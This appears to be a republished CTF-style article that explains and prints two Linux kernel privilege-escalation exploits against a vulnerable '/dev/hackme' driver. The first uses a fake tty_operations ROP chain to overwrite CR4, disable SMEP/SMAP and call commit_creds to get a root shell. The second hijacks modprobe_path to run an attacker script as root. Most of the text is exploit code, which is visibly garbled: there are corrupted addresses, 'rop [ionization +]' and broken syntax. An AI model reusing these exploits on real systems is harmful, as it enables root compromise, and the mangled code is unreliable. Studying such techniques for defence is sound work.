
Analysis of a kernel modprobe_path hijacking example


Shulou(Shulou.com)05/31 Report--

This article walks through an example of hijacking the kernel's modprobe_path. Many people run into this situation in practice; the following sections show how the technique works so that the behaviour can be understood and defended against.

Exp1

SMEP (Supervisor Mode Execution Prevention): user-space pages are not executable from kernel mode. When the CPU is running in ring 0, executing user-space code triggers a page fault. Whether SMEP is enabled is determined by bit 20 of the CR4 register (1 = enabled, 0 = disabled); bit 21 is SMAP.

SMAP (Supervisor Mode Access Prevention): user-space data is not accessible from kernel mode.

Both protections are controlled by CR4, so an attacker who can write that register (here to 0x6f0) disables them; this is why kernel hardening pins CR4 and treats control-register writes as security-sensitive.

# include # include size_t vmlinux_base, off, commit_creds, prepare_kernel_cred;size_t user_cs, user_ss, user_sp, user_rflags;size_t raw_vmlinux_base = 0xffffffffffffffffffffff81000000X sizetreast rop [0x100] = {0}; int fd;struct Heap {size_t index; char * data; size_t len; size_t offset;}; void add (int index, size_t len, char * data) {struct Heap heap Heap.index = index; heap.data = data; heap.len = len; ioctl (fd, 0x30000, & heap);} void delete (int index) {struct Heap heap; heap.index = index; ioctl (fd, 0x30001, & heap);} void edit (int index, size_t len, size_t offset, char * data) {struct Heap heap; heap.index = index Heap.data = data; heap.len = len; heap.offset = offset; ioctl (fd, 0x30002, & heap);} void show (int index, size_t len, size_t offset, char * data) {struct Heap heap; heap.index = index; heap.data = data; heap.len = len; heap.offset = offset; ioctl (fd, 0x30003, & heap) } void save_status () {_ asm__ ("mov user_cs, cs;"mov user_ss, ss;"mov user_sp, rsp;"pushf;"pop user_rflags;"); puts ("[+] save the state success!") } void get_shell () {if (getuid () = = 0) {puts ("[*] get root"); system ("/ bin/sh");} else {puts ("[-] get root error"); sleep (3); exit (0) }} void get_root () {/ / commit_creds (prepare_kernel_cred (0)) void * (* pkc) (int) = (void * (*) (int)) prepare_kernel_cred; void (* cc) (void *) = (void (*) (void *)) commit_creds; (* cc) ((* pkc) (0));} int main () {save_status () Char buf [0x1000] = {0}; size_t fake_tty_struct [4] = {0}; size_t fake_tty_operations [35] = {0}; fd = open ("/ dev/hackme", 0); if (fd)

< 0) { puts("[-] open file error"); sleep(3); exit(0); } add(0, 0x2e0, buf); // 0 add(1, 0x2e0, buf); // 1 add(2, 0x100, buf); // 2 add(3, 0x100, buf); // 3 delete(0); delete(2); show(3, 0x100, -0x100, buf); size_t heap_addr = ((size_t *)buf)[0] - 0x200; printf("[+] heap_addr=>

0x%lx\ n ", heap_addr); int fd_tty = open (" / dev/ptmx ", O_RDWR | O_NOCTTY); if (fd_tty)

< 0) { puts("[-] open ptmx error"); sleep(3); exit(0); } show(1, 0x400, -0x400, buf); vmlinux_base = ((size_t *)buf)[3] - 0x625d80; printf("[+] vmlinux_base=>

0x%lx\ n ", vmlinux_base); off = vmlinux_base-raw_vmlinux_base; commit_creds = off + 0xffffffffff8104d220; prepare_kernel_cred = off + 0xffffffffffff8104d3d0; int I = 0; rop [ionization +] = off + 0xffffffffffffffffffff8101b5a1; / / pop rax; ret; rop [ionization +] = 0x6f0; rop [ionization +] = off + 0xffffffffffffffffff8100252b; / / mov cr4, rax; push rcx; popfq; pop rbp; ret Rop [ionization +] = 0; rop [ionization +] = (size_t) get_root; rop [ionization +] = off + 0xffffffffffffffffffffffff81200c2e; / / swapgs; popfq; pop rbp; ret; rop [ionization +] = 0; rop [ionization +] = 0; rop [ionization +] = off + 0xffffffffffffffffffffffffffffffffffffffffff81019356; / / iretq; pop rbp; ret; rop [ionization +] = (size_t) get_shell; rop [ionization +] = user_cs Rop [ionization +] = user_rflags; rop [ionization +] = user_sp; rop [ionization +] = user_ss; add (2, 0x100, (char *) rop); fake_tty_operations [7] = off + 0xffffffffffffffffffffffff810608d5; / / push rax; pop rsp; ret; fake_tty_operations [0] = off + 0xffffffffffffffff810484f0; / / pop rsp; ret; fake_tty_operations [1] = heap_addr ((size_t *) buf) [3] = heap_addr + 0x100; delete (3); add (3, 0x100, (char *) fake_tty_operations); edit (1, 0x400,-0x400, buf); write (fd_tty, "FXC", 3); return 0;} exp2

mod_tree: the loaded module (driver) address can be leaked through it; look here when the address cannot be found on the stack.

modprobe_path: when the kernel is asked to execute a file whose format it does not recognise, it runs the program pointed to by modprobe_path with root privileges, normally /sbin/modprobe. If that path is redirected to a script the attacker created (here one that reads the flag), the flag can be obtained. Kernels built with CONFIG_STATIC_USERMODEHELPER route this through a fixed helper path, which defeats this technique.

# include # include int fd;size_t heap_base, vmlinux_base, mod_tree, modprobe_path, ko_base, pool_addr;struct Heap {size_t index; char * data; size_t len; size_t offset;}; void add (int index, size_t len, char * data) {struct Heap heap; heap.index = index; heap.data = data; heap.len = len Ioctl (fd, 0x30000, & heap);} void delete (int index) {struct Heap heap; heap.index = index; ioctl (fd, 0x30001, & heap);} void edit (int index, size_t len, size_t offset, char * data) {struct Heap heap; heap.index = index; heap.data = data; heap.len = len; heap.offset = offset Ioctl (fd, 0x30002, & heap);} void show (int index, size_t len, size_t offset, char * data) {struct Heap heap; heap.index = index; heap.data = data; heap.len = len; heap.offset = offset; ioctl (fd, 0x30003, & heap);} void get_flag () {puts ("[+] Prepare shell file.") System ("echo-ne'#! / bin/sh\ n/bin/chmod 777 / flag\ n'> / shell.sh"); system ("chmod + x / shell.sh"); puts ("[+] Prepare trigger file."); system ("echo-ne'\\ xff\\ xff\ xff\ xff' > / FXC"); system ("chmod + x / FXC") System ("cat / proc/sys/kernel/modprobe"); system ("/ FXC"); system ("cat / flag"); sleep (5);} int main () {fd = open ("/ dev/hackme", 0); if (fd)

< 0) { puts("[-] open file error"); sleep(3); exit(0); } char buf[0x1000] = {0}; add(0, 0x100, buf); // 0 add(1, 0x100, buf); // 1 add(2, 0x100, buf); // 2 add(3, 0x100, buf); // 3 add(4, 0x100, buf); // 4 delete(1); delete(3); show(4, 0x100, -0x100, buf); heap_base = ((size_t *)buf)[0] - 0x100; printf("[+] heap_addr=>

0x%lx\ n ", heap_base); show (0, 0x200,-0x200, buf); vmlinux_base= ((size_t *) buf) [0]-0x8472c0; printf (" [+] vmlinux_base= > 0x%lx\ n ", vmlinux_base); mod_tree = vmlinux_base + 0x811000; modprobe_path = vmlinux_base + 0x83f960; memset (buf,'\ x00,0x100) ((size_t *) buf) [0] = mod_tree + 0x40; edit (4, 0x100,-0x100, buf); add (5, 0x100, buf); / / 5 add (6, 0x100, buf); / / 6 show (6, 0x40,-0x40, buf); ko_base = (size_t *) buf) [3] Printf ("[+] ko_base= > 0x%lx\ n", ko_base); delete (2); delete (5); getchar (); ((size_t *) buf) [0] = ko_base + 0x2400 + 0xc0; edit (4, 0x100,-0x100, buf); add (7, 0x100, buf); / / 7 add (8, 0x100, buf) / 8 ((size_t *) buf) [0] = modprobe_path; ((size_t *) buf) [1] = 0x100; edit (8, 0x10, 0, buf); strncpy (buf, "/ shell.sh\ x00", 0xa); edit (12, 0xa, 0, buf); get_flag (); return 0 } this is the end of the content analysis of kernel hijacking modprobe path content. Thank you for your reading. If you want to know more about the industry, you can follow the website, the editor will output more high-quality practical articles for you!
